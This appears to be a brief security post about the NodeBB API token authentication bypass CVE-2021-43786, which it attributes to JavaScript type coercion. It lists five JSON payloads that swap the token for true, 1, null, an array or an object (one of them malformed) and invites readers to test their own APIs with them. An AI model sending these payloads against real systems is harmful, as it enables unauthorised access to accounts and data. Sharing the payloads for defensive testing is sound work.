NodeBB API token auth bypass CVE-2021-43786

You can find just a great example of an API token validation vulnerability caused by types casting. Can you catch this in a code by this fix?

In JavaScript, types like true, false, null, and undefined are different.

That's why all these type casting tricks works well in API security reality:

{"api-token": true}
{"api-token": 1}
{"api-token": {"bypass"}
{"api-token": [true]}
{"api-token": null}        

I highly recommend you to check you APIs right now by the payloads above ;)